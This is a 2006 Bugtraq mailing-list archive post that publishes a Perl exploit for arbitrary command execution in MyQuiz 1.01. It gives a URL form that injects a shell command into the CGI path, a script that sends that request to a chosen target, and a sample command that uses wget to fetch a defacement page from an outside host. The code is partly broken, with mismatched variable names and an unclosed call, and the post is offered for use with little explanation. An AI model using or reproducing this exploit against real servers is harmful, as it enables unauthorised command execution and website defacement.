|
Bugtraq
mailing list archives
MyQuiz Arbitrary Command Execution Exploit (perl)
From: irc0d3r () yahoo com
Date: 7 Feb 2006 15:02:05 -0000
This Perl Exploit for MyQuiz 1.01 Arbitrary Command Execution Exploit.
Athour : Hessam-x - www.hessamx.net
+IHST : iran hackerz security team (hackerz.ir)
#((Perl exploit))
#!/usr/bin/perl
# => MyQuiz Remote Command Execution Exploit
# -> By Hessam-x / www.hackerz.ir
# manual exploiting --> http://[target]/cgi-bin/myquiz.pl/ask/;<Command>|
# Iran Hackerz Security Team
# Hessam-x : www.hessamx.net
use LWP::Simple;
print "Target(www.example.com)\$ ";
chomp($targ = <STDIN>);
print "path: (/cgi-bin/)\$ \n";
chomp($path=<STDIN>);
print "command: (wget www.hackerz.ir/deface.htm)\$ \n";
chomp($comd=<STDIN>);
$page=get("http://".$targ.$patch) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $targ\n";
print "[~] Sending exploiting request, wait for some seconds/minutes...\n";
get("http://".$ARGV[0].$ARGV[1]."\;".$comd."\|"
print "[+] Exploiting request done!\n";
print "Enjoy !";
 By Date 
By Thread
Current thread:
- MyQuiz Arbitrary Command Execution Exploit (perl) irc0d3r (Feb 07)
| 
Intro
